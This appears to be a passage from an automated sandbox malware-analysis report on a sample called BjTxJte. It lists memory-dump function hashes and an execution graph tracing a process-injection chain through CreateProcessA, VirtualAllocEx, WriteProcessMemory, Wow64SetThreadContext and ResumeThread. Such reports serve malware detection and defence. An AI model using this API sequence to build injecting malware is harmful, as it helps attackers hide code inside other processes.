                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: 021eb24356a50081ac0ff9ed4e6b4e8672c3021167ad430a638925159ce89960
                                  • Instruction ID: 24eef241d885f08ccc354d12d363e422f33756edf470e9ae27917bfe765f77f3
                                  • Opcode Fuzzy Hash: 021eb24356a50081ac0ff9ed4e6b4e8672c3021167ad430a638925159ce89960
                                  • Instruction Fuzzy Hash: FCB16B30F002098FDB54EF69D5906AEBBB6FF85350F248829D4169B7A5DB74DC82CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F4AC88 Relevance: 5.2, Strings: 4, Instructions: 177COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: e5b3f9d44ec6345302e117a36a8d2828541512c7bdbf089711175064b9e886d6
                                  • Instruction ID: b6d5e08fe858731dd37e475712316dd92ea7925ca96b53b8d540d1c55c5158b5
                                  • Opcode Fuzzy Hash: e5b3f9d44ec6345302e117a36a8d2828541512c7bdbf089711175064b9e886d6
                                  • Instruction Fuzzy Hash: 0851C334E402058FDFA4EB69E9806AEBBB6FF85310F108529D816DB759DB35DC41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F487C0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq$LRjq$$jq$$jq
                                  • API String ID: 0-2974078839
                                  • Opcode ID: bfdce5a08486b10763d3cb69a62be22a402d5f661292822dc75e86beac4c0815
                                  • Instruction ID: 52bb2a7fc842dee565ee5407012aa9276e70052ff22ade401fb301ce9466b4bb
                                  • Opcode Fuzzy Hash: bfdce5a08486b10763d3cb69a62be22a402d5f661292822dc75e86beac4c0815
                                  • Instruction Fuzzy Hash: BA51D231B002058FEB58EB78D990A6EBBE6FF84750F10856DD4129B7A9DB75EC00CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:9.9%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:207
                                  Total number of Limit Nodes:12
                                  execution_graph 49547 548d6da 49552 548f7c0 49547->49552 49565 548f836 49547->49565 49579 548f7d0 49547->49579 49548 548d6ee 49553 548f7ea 49552->49553 49554 548f7f2 49553->49554 49592 d1a028a 49553->49592 49596 d1a0195 49553->49596 49601 d1a0440 49553->49601 49606 d1a0533 49553->49606 49611 d1a026d 49553->49611 49616 d1a032f 49553->49616 49621 d1a015e 49553->49621 49626 d1a01d8 49553->49626 49633 d1a083b 49553->49633 49638 d1a01fb 49553->49638 49554->49548 49566 548f7c4 49565->49566 49568 548f839 49565->49568 49567 548f7f2 49566->49567 49569 d1a028a 2 API calls 49566->49569 49570 d1a01fb 4 API calls 49566->49570 49571 d1a083b 2 API calls 49566->49571 49572 d1a01d8 4 API calls 49566->49572 49573 d1a015e 2 API calls 49566->49573 49574 d1a032f 2 API calls 49566->49574 49575 d1a026d 2 API calls 49566->49575 49576 d1a0533 2 API calls 49566->49576 49577 d1a0440 2 API calls 49566->49577 49578 d1a0195 2 API calls 49566->49578 49567->49548 49568->49548 49569->49567 49570->49567 49571->49567 49572->49567 49573->49567 49574->49567 49575->49567 49576->49567 49577->49567 49578->49567 49580 548f7ea 49579->49580 49581 548f7f2 49580->49581 49582 d1a028a 2 API calls 49580->49582 49583 d1a01fb 4 API calls 49580->49583 49584 d1a083b 2 API calls 49580->49584 49585 d1a01d8 4 API calls 49580->49585 49586 d1a015e 2 API calls 49580->49586 49587 d1a032f 2 API calls 49580->49587 49588 d1a026d 2 API calls 49580->49588 49589 d1a0533 2 API calls 49580->49589 49590 d1a0440 2 API calls 49580->49590 49591 d1a0195 2 API calls 49580->49591 49581->49548 49582->49581 49583->49581 49584->49581 49585->49581 49586->49581 49587->49581 49588->49581 49589->49581 49590->49581 49591->49581 49593 d1a028b 49592->49593 49645 548cdd8 49593->49645 49649 548cde0 49593->49649 49598 d1a024c 49596->49598 49597 d1a081e 49598->49597 49653 548d021 49598->49653 49657 548d028 49598->49657 49602 d1a0463 49601->49602 49604 548d028 WriteProcessMemory 49602->49604 49605 548d021 WriteProcessMemory 49602->49605 49603 d1a04ba 49603->49554 49604->49603 49605->49603 49607 d1a0539 49606->49607 49661 548d118 49607->49661 49665 548d116 49607->49665 49608 d1a055c 49608->49554 49612 d1a0978 49611->49612 49669 548cf68 49612->49669 49673 548cf60 49612->49673 49613 d1a08d9 49613->49554 49617 d1a0335 49616->49617 49619 548d028 WriteProcessMemory 49617->49619 49620 548d021 WriteProcessMemory 49617->49620 49618 d1a03b4 49618->49554 49619->49618 49620->49618 49622 d1a016a 49621->49622 49677 548ce88 49622->49677 49681 548ce90 49622->49681 49623 d1a00f8 49623->49554 49627 d1a01e9 49626->49627 49628 d1a01a3 49626->49628 49631 548ce88 Wow64SetThreadContext 49627->49631 49632 548ce90 Wow64SetThreadContext 49627->49632 49629 548cdd8 ResumeThread 49628->49629 49630 548cde0 ResumeThread 49628->49630 49629->49628 49630->49628 49631->49628 49632->49628 49634 d1a016a 49633->49634 49634->49633 49636 548ce88 Wow64SetThreadContext 49634->49636 49637 548ce90 Wow64SetThreadContext 49634->49637 49635 d1a00f8 49635->49554 49636->49635 49637->49635 49639 d1a01ff 49638->49639 49643 548ce88 Wow64SetThreadContext 49639->49643 49644 548ce90 Wow64SetThreadContext 49639->49644 49640 d1a01a3 49641 548cdd8 ResumeThread 49640->49641 49642 548cde0 ResumeThread 49640->49642 49641->49640 49642->49640 49643->49640 49644->49640 49646 548ce20 ResumeThread 49645->49646 49648 548ce51 49646->49648 49648->49593 49650 548ce20 ResumeThread 49649->49650 49652 548ce51 49650->49652 49652->49593 49654 548d070 WriteProcessMemory 49653->49654 49656 548d0c7 49654->49656 49656->49598 49658 548d070 WriteProcessMemory 49657->49658 49660 548d0c7 49658->49660 49660->49598 49662 548d163 ReadProcessMemory 49661->49662 49664 548d1a7 49662->49664 49664->49608 49666 548d163 ReadProcessMemory 49665->49666 49668 548d1a7 49666->49668 49668->49608 49670 548cfa8 VirtualAllocEx 49669->49670 49672 548cfe5 49670->49672 49672->49613 49674 548cfa8 VirtualAllocEx 49673->49674 49676 548cfe5 49674->49676 49676->49613 49678 548ce91 Wow64SetThreadContext 49677->49678 49680 548cf1d 49678->49680 49680->49623 49682 548ced5 Wow64SetThreadContext 49681->49682 49684 548cf1d 49682->49684 49684->49623 49759 cc4668 49760 cc467a 49759->49760 49761 cc4686 49760->49761 49763 cc4778 49760->49763 49764 cc479d 49763->49764 49768 cc4888 49764->49768 49772 cc4879 49764->49772 49770 cc48af 49768->49770 49769 cc498c 49769->49769 49770->49769 49776 cc44e4 49770->49776 49773 cc48af 49772->49773 49774 cc498c 49773->49774 49775 cc44e4 CreateActCtxA 49773->49775 49775->49774 49777 cc5918 CreateActCtxA 49776->49777 49779 cc59db 49777->49779 49780 ccb478 49781 ccb487 49780->49781 49783 ccb55f 49780->49783 49784 ccb581 49783->49784 49785 ccb5a4 49783->49785 49784->49785 49791 ccb7f8 49784->49791 49795 ccb808 49784->49795 49785->49781 49786 ccb59c 49786->49785 49787 ccb7a8 GetModuleHandleW 49786->49787 49788 ccb7d5 49787->49788 49788->49781 49792 ccb81c 49791->49792 49794 ccb841 49792->49794 49799 ccafb0 49792->49799 49794->49786 49796 ccb81c 49795->49796 49797 ccafb0 LoadLibraryExW 49796->49797 49798 ccb841 49796->49798 49797->49798 49798->49786 49800 ccb9e8 LoadLibraryExW 49799->49800 49802 ccba61 49800->49802 49802->49794 49803 ccd7f8 49804 ccd83e 49803->49804 49807 ccd9d8 49804->49807 49810 ccd0e0 49807->49810 49811 ccda40 DuplicateHandle 49810->49811 49812 ccd92b 49811->49812 49813 548d2b0 49814 548d339 CreateProcessA 49813->49814 49816 548d4fb 49814->49816 49816->49816 49685 d1a0f80 49686 d1a110b 49685->49686 49687 d1a0fa6 49685->49687 49687->49686 49690 d1a11f8 49687->49690 49693 d1a1200 PostMessageW 49687->49693 49691 d1a11fd PostMessageW 49690->49691 49692 d1a126c 49691->49692 49692->49687 49694 d1a126c 49693->49694 49694->49687 49695 4de2180 49696 4de21b5 49695->49696 49698 4de0f80 49695->49698 49699 4de21d0 CreateWindowExW 49698->49699 49701 4de22f4 49699->49701 49702 c3d01c 49703 c3d034 49702->49703 49704 c3d08e 49703->49704 49709 4de0fac 49703->49709 49718 4de2377 49703->49718 49723 4de30e8 49703->49723 49732 4de2388 49703->49732 49712 4de0fb7 49709->49712 49710 4de3159 49749 4de10d4 49710->49749 49712->49710 49713 4de3149 49712->49713 49736 4de334c 49713->49736 49741 4de3280 49713->49741 49745 4de3270 49713->49745 49714 4de3157 49714->49714 49719 4de237f 49718->49719 49719->49719 49720 4de235f 49719->49720 49721 4de0fac CallWindowProcW 49719->49721 49720->49704 49722 4de23cf 49721->49722 49722->49704 49726 4de3125 49723->49726 49724 4de3159 49725 4de10d4 CallWindowProcW 49724->49725 49728 4de3157 49725->49728 49726->49724 49727 4de3149 49726->49727 49729 4de334c CallWindowProcW 49727->49729 49730 4de3280 CallWindowProcW 49727->49730 49731 4de3270 CallWindowProcW 49727->49731 49728->49728 49729->49728 49730->49728 49731->49728 49733 4de23ae 49732->49733 49734 4de0fac CallWindowProcW 49733->49734 49735 4de23cf 49734->49735 49735->49704 49737 4de330a 49736->49737 49738 4de335a 49736->49738 49753 4de3338 49737->49753 49739 4de3320 49739->49714 49743 4de3294 49741->49743 49742 4de3320 49742->49714 49744 4de3338 CallWindowProcW 49743->49744 49744->49742 49747 4de3294 49745->49747 49746 4de3320 49746->49714 49748 4de3338 CallWindowProcW 49747->49748 49748->49746 49750 4de10df 49749->49750 49751 4de483a CallWindowProcW 49750->49751 49752 4de47e9 49750->49752 49751->49752 49752->49714 49754 4de3349 49753->49754 49756 4de4780 49753->49756 49754->49739 49757 4de10d4 CallWindowProcW 49756->49757 49758 4de478a 49757->49758 49758->49754

                                  Executed Functions

                                  Function 04EB39C8 Relevance: 2.7, Strings: 2, Instructions: 214COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 826 4eb39c8-4eb3a2a call 4eb2d98 832 4eb3a2c-4eb3a2e 826->832 833 4eb3a90-4eb3abc 826->833 834 4eb3ac3-4eb3acb 832->834 835 4eb3a34-4eb3a40 832->835 833->834 840 4eb3ad2-4eb3c0d 834->840 835->840 841 4eb3a46-4eb3a81 call 4eb387c 835->841 858 4eb3c13-4eb3c21 840->858 851 4eb3a86-4eb3a8f 841->851 859 4eb3c2a-4eb3c70 858->859 860 4eb3c23-4eb3c29 858->860 865 4eb3c7d 859->865 866 4eb3c72-4eb3c75 859->866 860->859 867 4eb3c7e 865->867 866->865 867->867
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Hnq$Hnq
                                  • API String ID: 0-3075287205
                                  • Opcode ID: f096ea641ef4aa0b1b8e4887a4d645ba0b74e3993e9c3d5ec73343f86230e3a0
                                  • Instruction ID: 0cc93e03f1bdfa337231ea089d5a3aa5b549a7dd002626cb80d8d6b566f5b09e
                                  • Opcode Fuzzy Hash: f096ea641ef4aa0b1b8e4887a4d645ba0b74e3993e9c3d5ec73343f86230e3a0
                                  • Instruction Fuzzy Hash: 14817B70E003188FDB04DFA9C8846EEBBF2FF88300F14856AE405AB355DB789905CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EBD5C8 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1013 4ebd5c8-4ebd5eb 1014 4ebd5f5-4ebd5f8 1013->1014 1015 4ebd601-4ebd73d 1014->1015
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'jq$4'jq
                                  • API String ID: 0-1204115232
                                  • Opcode ID: 0e3846b52d957595ac01aca46a697a82735b4e5ce754d39df302b7129d95041d
                                  • Instruction ID: 8e0683589d91bb171627f01a02c2fea5cbe51970932cac498874889aeafaaaa9
                                  • Opcode Fuzzy Hash: 0e3846b52d957595ac01aca46a697a82735b4e5ce754d39df302b7129d95041d
                                  • Instruction Fuzzy Hash: D1418231E01B0A9BDB14EFB9D84069DB7B2FF95300F21462AE5057B251EBB47985CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EBD5D8 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1029 4ebd5d8-4ebd5f8 1031 4ebd601-4ebd73d 1029->1031
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'jq$4'jq
                                  • API String ID: 0-1204115232
                                  • Opcode ID: 01b878adcd796969fe4ce955009ef2ef8bdd5c64009533048c15b3c34ab7b1e7
                                  • Instruction ID: 4894ee3befbb0aea85883470bea9b35fb5a3b06830b34ec6d84dfedd4e493e90
                                  • Opcode Fuzzy Hash: 01b878adcd796969fe4ce955009ef2ef8bdd5c64009533048c15b3c34ab7b1e7
                                  • Instruction Fuzzy Hash: CD416231E01B1AABDB14EFB9D8406DDB7B2FF94300F214629E5057B251EBB07985CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0548D2A4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1433 548d2a4-548d345 1435 548d37e-548d39e 1433->1435 1436 548d347-548d351 1433->1436 1443 548d3a0-548d3aa 1435->1443 1444 548d3d7-548d406 1435->1444 1436->1435 1437 548d353-548d355 1436->1437 1438 548d378-548d37b 1437->1438 1439 548d357-548d361 1437->1439 1438->1435 1441 548d363 1439->1441 1442 548d365-548d374 1439->1442 1441->1442 1442->1442 1446 548d376 1442->1446 1443->1444 1445 548d3ac-548d3ae 1443->1445 1452 548d408-548d412 1444->1452 1453 548d43f-548d4f9 CreateProcessA 1444->1453 1447 548d3b0-548d3ba 1445->1447 1448 548d3d1-548d3d4 1445->1448 1446->1438 1450 548d3bc 1447->1450 1451 548d3be-548d3cd 1447->1451 1448->1444 1450->1451 1451->1451 1454 548d3cf 1451->1454 1452->1453 1455 548d414-548d416 1452->1455 1464 548d4fb-548d501 1453->1464 1465 548d502-548d588 1453->1465 1454->1448 1457 548d418-548d422 1455->1457 1458 548d439-548d43c 1455->1458 1459 548d424 1457->1459 1460 548d426-548d435 1457->1460 1458->1453 1459->1460 1460->1460 1462 548d437 1460->1462 1462->1458 1464->1465 1475 548d598-548d59c 1465->1475 1476 548d58a-548d58e 1465->1476 1477 548d5ac-548d5b0 1475->1477 1478 548d59e-548d5a2 1475->1478 1476->1475 1479 548d590 1476->1479 1481 548d5c0-548d5c4 1477->1481 1482 548d5b2-548d5b6 1477->1482 1478->1477 1480 548d5a4 1478->1480 1479->1475 1480->1477 1484 548d5d6-548d5dd 1481->1484 1485 548d5c6-548d5cc 1481->1485 1482->1481 1483 548d5b8 1482->1483 1483->1481 1486 548d5df-548d5ee 1484->1486 1487 548d5f4 1484->1487 1485->1484 1486->1487 1488 548d5f5 1487->1488 1488->1488
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0548D4E6
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 121fdc9c65b303bd7f600451612aff418bd22ee023e0fc246fb3d13cdc1e3f14
                                  • Instruction ID: edee15dacecf7c055b02d3eb80e6a379fcaa398ab8bfdf3ff1b5ac18cdc1fc31
                                  • Opcode Fuzzy Hash: 121fdc9c65b303bd7f600451612aff418bd22ee023e0fc246fb3d13cdc1e3f14
                                  • Instruction Fuzzy Hash: C3A18B71D01219DFDB24DF68C845BEEBBB2BF48314F1481AAD809A7390DB749985CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0548D2B0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1490 548d2b0-548d345 1492 548d37e-548d39e 1490->1492 1493 548d347-548d351 1490->1493 1500 548d3a0-548d3aa 1492->1500 1501 548d3d7-548d406 1492->1501 1493->1492 1494 548d353-548d355 1493->1494 1495 548d378-548d37b 1494->1495 1496 548d357-548d361 1494->1496 1495->1492 1498 548d363 1496->1498 1499 548d365-548d374 1496->1499 1498->1499 1499->1499 1503 548d376 1499->1503 1500->1501 1502 548d3ac-548d3ae 1500->1502 1509 548d408-548d412 1501->1509 1510 548d43f-548d4f9 CreateProcessA 1501->1510 1504 548d3b0-548d3ba 1502->1504 1505 548d3d1-548d3d4 1502->1505 1503->1495 1507 548d3bc 1504->1507 1508 548d3be-548d3cd 1504->1508 1505->1501 1507->1508 1508->1508 1511 548d3cf 1508->1511 1509->1510 1512 548d414-548d416 1509->1512 1521 548d4fb-548d501 1510->1521 1522 548d502-548d588 1510->1522 1511->1505 1514 548d418-548d422 1512->1514 1515 548d439-548d43c 1512->1515 1516 548d424 1514->1516 1517 548d426-548d435 1514->1517 1515->1510 1516->1517 1517->1517 1519 548d437 1517->1519 1519->1515 1521->1522 1532 548d598-548d59c 1522->1532 1533 548d58a-548d58e 1522->1533 1534 548d5ac-548d5b0 1532->1534 1535 548d59e-548d5a2 1532->1535 1533->1532 1536 548d590 1533->1536 1538 548d5c0-548d5c4 1534->1538 1539 548d5b2-548d5b6 1534->1539 1535->1534 1537 548d5a4 1535->1537 1536->1532 1537->1534 1541 548d5d6-548d5dd 1538->1541 1542 548d5c6-548d5cc 1538->1542 1539->1538 1540 548d5b8 1539->1540 1540->1538 1543 548d5df-548d5ee 1541->1543 1544 548d5f4 1541->1544 1542->1541 1543->1544 1545 548d5f5 1544->1545 1545->1545
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0548D4E6
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: a11a9a9fd67e0ba67aeab651737a7aa9017c4c9645ff532cc8aae09d41a65fc2
                                  • Instruction ID: ea7b9063229047c1d81bd915cf04b9ef6e84277706ae29488a265fece8a16cbf
                                  • Opcode Fuzzy Hash: a11a9a9fd67e0ba67aeab651737a7aa9017c4c9645ff532cc8aae09d41a65fc2
                                  • Instruction Fuzzy Hash: E9918B71D01219DFDB24DF68C944BEEBBB2BF48314F0481AAE809A7390DB749985CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00CCB55F Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1547 ccb55f-ccb57f 1548 ccb5ab-ccb5af 1547->1548 1549 ccb581-ccb58e call cc8ac0 1547->1549 1551 ccb5b1-ccb5bb 1548->1551 1552 ccb5c3-ccb604 1548->1552 1556 ccb5a4 1549->1556 1557 ccb590 1549->1557 1551->1552 1558 ccb606-ccb60e 1552->1558 1559 ccb611-ccb61f 1552->1559 1556->1548 1602 ccb596 call ccb7f8 1557->1602 1603 ccb596 call ccb808 1557->1603 1558->1559 1560 ccb621-ccb626 1559->1560 1561 ccb643-ccb645 1559->1561 1563 ccb628-ccb62f call ccaf54 1560->1563 1564 ccb631 1560->1564 1566 ccb648-ccb64f 1561->1566 1562 ccb59c-ccb59e 1562->1556 1565 ccb6e0-ccb7a0 1562->1565 1570 ccb633-ccb641 1563->1570 1564->1570 1597 ccb7a8-ccb7d3 GetModuleHandleW 1565->1597 1598 ccb7a2-ccb7a5 1565->1598 1567 ccb65c-ccb663 1566->1567 1568 ccb651-ccb659 1566->1568 1571 ccb665-ccb66d 1567->1571 1572 ccb670-ccb679 call ccaf64 1567->1572 1568->1567 1570->1566 1571->1572 1578 ccb67b-ccb683 1572->1578 1579 ccb686-ccb68b 1572->1579 1578->1579 1580 ccb68d-ccb694 1579->1580 1581 ccb6a9-ccb6b6 1579->1581 1580->1581 1583 ccb696-ccb6a6 call ccaf74 call ccaf84 1580->1583 1587 ccb6b8-ccb6d6 1581->1587 1588 ccb6d9-ccb6df 1581->1588 1583->1581 1587->1588 1599 ccb7dc-ccb7f0 1597->1599 1600 ccb7d5-ccb7db 1597->1600 1598->1597 1600->1599 1602->1562 1603->1562
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00CCB7C6
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: e5b70bec268d8a98aa968b881c37eb5dcfcf76b746b546ba5c99c42c17e51b1a
                                  • Instruction ID: 4803abe3bc453552ef597bc1027300d8da94d547853a0f2861fd537d7d3cd9ea
                                  • Opcode Fuzzy Hash: e5b70bec268d8a98aa968b881c37eb5dcfcf76b746b546ba5c99c42c17e51b1a
                                  • Instruction Fuzzy Hash: AF8168B0A00B058FDB28DFA9D041B5ABBF1FF88300F10892DE09AD7A50D774E945CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04DE0F80 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DE22E2
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321080197.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4de0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: b6ffe79afede38c72afbbdb889504be3d2db91c69d1f210c46c5ca7602933caf
                                  • Instruction ID: 52f1fa8fda45429a0670950b20ec30db99b3d28e479393f46cca7120fff94a8e
                                  • Opcode Fuzzy Hash: b6ffe79afede38c72afbbdb889504be3d2db91c69d1f210c46c5ca7602933caf
                                  • Instruction Fuzzy Hash: 1B51B2B1D003499FDB14DF9AC884ADEBBF5FF48310F24856AE819AB210D775A845CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04DE21C4 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DE22E2
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321080197.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4de0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 35f0ae21e03fbe93ee79670670f4381b03c3f188de2fddc524b9ace03b5ed219
                                  • Instruction ID: 82c2bb48545e0be5bc4bfeece5a088b62f6ae7a15b97bfcf0bcc1af79551904a
                                  • Opcode Fuzzy Hash: 35f0ae21e03fbe93ee79670670f4381b03c3f188de2fddc524b9ace03b5ed219
                                  • Instruction Fuzzy Hash: 9E51D2B1D00309DFDB14DFAAC980ADEBBB5FF48310F24852AE818AB210D774A845CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04DE10D4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                  Download Yara Rule
                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04DE4861
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321080197.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4de0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  • Opcode ID: 069975d42be3c1d6b4d593fef273b07c0871e9e94a86438af3534fc44a4cc43b
                                  • Instruction ID: b6c9cae4a61012abb528ec4e43dafb92023d2949ca14ecc1376230d17ddecf50
                                  • Opcode Fuzzy Hash: 069975d42be3c1d6b4d593fef273b07c0871e9e94a86438af3534fc44a4cc43b
                                  • Instruction Fuzzy Hash: D64116B4A00249DFDB14DF9AC488AAABBF5FF88314F24C459D519AB321D374E841CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00CC44E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00CC59C9
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 0b63a4e43a44aea14706bd6c65728177e61db330cc301ea5f9296477812d0a9a
                                  • Instruction ID: ebbfba52139e408b6aa42ba4e200782f91e394f56c35a4321e946c84ebfad418
                                  • Opcode Fuzzy Hash: 0b63a4e43a44aea14706bd6c65728177e61db330cc301ea5f9296477812d0a9a
                                  • Instruction Fuzzy Hash: 3F41F3B0C0071DCBDB24CFAAC844B9DBBF5BF49304F20816AD419AB255DBB56986CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00CC590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00CC59C9
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 6589574b5d28c1c1bfe27fc7ecec9e1c95551c1ef4d94d8eee8733543dc381b7
                                  • Instruction ID: 442e64a3cbffc8847682066f9ffddf0d6c2b8de2d6e9773701a8c1fb2ae7e0ff
                                  • Opcode Fuzzy Hash: 6589574b5d28c1c1bfe27fc7ecec9e1c95551c1ef4d94d8eee8733543dc381b7
                                  • Instruction Fuzzy Hash: ED4104B1C0071DCBDB24CFAAC844BDDBBB5BF49704F20816AD408AB255DBB56986CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0548D021 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0548D0B8
                                  Memory Dump Source
